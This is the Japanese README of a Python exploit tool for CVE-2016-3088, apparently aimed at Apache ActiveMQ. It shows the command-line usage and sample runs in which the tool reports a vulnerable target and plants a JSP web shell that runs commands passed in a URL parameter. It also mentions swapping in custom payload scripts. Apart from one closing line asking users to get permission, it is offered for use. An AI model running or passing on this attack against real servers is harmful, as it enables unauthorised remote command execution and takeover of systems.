
CVE-2016-3088 向けの Python ベースのエクスプロイトスクリプト
CVE-2016-3088 用の Python ベースの Exploit スクリプトです。
初めて作成したスクリプトなので、うまく適合しない部分があるかもしれません。
しかし、テストしたときには問題なく動作したようです。
このスクリプトは、CVE-2016-3088 のペネトレーション時にパケットキャプチャを不要にし、
ファイルを直接書き込んだり移動したりできるようにします。
python CVE-2016-3088.py --url http://ip:port/ [--path absolute_path] [--script filename.txt]
--script パラメータはオプションです。このパラメータなしでプログラムを実行すると、組み込みのペイロードが使用されます。
そのペイロードは URL 上でいくつかのコマンドを実行できるだけのものです。
ただし、他のスクリプトを指定して目的を達成することもできます。
.py ファイルをダウンロードするだけです。
また、いくつかのモジュールが必要です。
$ python CVE-2016-3088.py --url http://192.168.244.153:8161/ --path /opt/activemq
[+] The target is Vulnerable
[+] Exploiting...
[+] Successful!
[+] Visit The JSP file: http://192.168.244.153:8161/admin/d404ca6ffa5849a9ab1202dd388684f5.jsp?pwd=023&i=[Your-Command]
$ python CVE-2016-3088.py --url http://192.168.244.153:8161/ --path /opt/activemq --script script.txt
[+] The target is Vulnerable
[+] Exploiting...
[+] Successful!
[+] Visit The JSP file: http://192.168.244.153:8161/admin/6655d82d47cd43bb8a21515f476bce1f.jsp
このツールは注意して使用し、許可を得た場合にのみ使用してください!